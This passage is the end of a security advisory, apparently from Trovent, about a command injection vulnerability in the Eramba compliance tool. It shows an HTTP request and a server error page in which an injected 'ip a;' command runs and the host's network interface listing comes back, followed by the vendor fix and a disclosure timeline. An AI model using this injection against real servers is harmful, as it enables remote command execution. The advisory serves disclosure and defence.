csrfToken=1l2rXXwj1D1hVyVRH%2B1g%2BzIzYTA3OGFiNWRjZWVmODQ1OTU1NWEyODM2MzIwZTZkZTVlNmU1YjY%3D; PHPSESSID=14j6sfroe6t2g1mh71g2a1vjg8User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateReferer: https://[redacted]/settingsUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersConnection: close~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~HTTP response:~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~HTTP/1.1 500 Internal Server ErrorDate: Fri, 31 Mar 2023 12:37:55 GMTServer: Apache/2.4.41 (Ubuntu)Access-Control-Allow-Origin: *Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Disposition: attachment; filename="test.pdf"X-DEBUGKIT-ID: d383f6d4-6680-4db0-b574-fe789abc1718Connection: closeContent-Type: text/html; charset=UTF-8Content-Length: 2033469<!DOCTYPE html><html><head>    <meta charset="utf-8"/>    <meta name="viewport" content="width=device-width, initial-scale=1.0">    <title>        Error: The exit status code '127' says something went wrong:stderr: "sh: 1: --dpi: not found"stdout: "1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00    inet 127.0.0.1/8 scope host lo       valid_lft forever preferred_lft forever    inet6 ::1/128 scope host       valid_lft forever preferred_lft forever2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000    link/ether [redacted] brd ff:ff:ff:ff:ff:ff    inet [redacted] brd [redacted] scope global ens33       valid_lft forever preferred_lft forever    inet6 [redacted] scope link       valid_lft forever preferred_lft forever"command: ip a; --dpi '90' --lowquality --margin-bottom '0' --margin-left '0' --margin-right '0' --margin-top '0' --orientation 'Landscape' --javascript-delay '1000' '/tmp/knp_snappy6426d4231040e1.91046751.html''/tmp/knp_snappy6426d423104587.46971034.pdf'.    </title>[...]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Solution / Workaround#####################The vendor released a fixed version of Eramba.Fixed in version 3.19.2.History#######2023-03-31: Vulnerability found2023-04-04: Vendor contacted2023-04-17: Vendor confirmed vulnerability2023-04-20: Vendor released fixed version2023-05-25: Trovent verified remediation of the vulnerability2023-06-13: CVE ID requested2023-07-28: CVE ID received2023-08-01: Advisory published

Tag

#csrf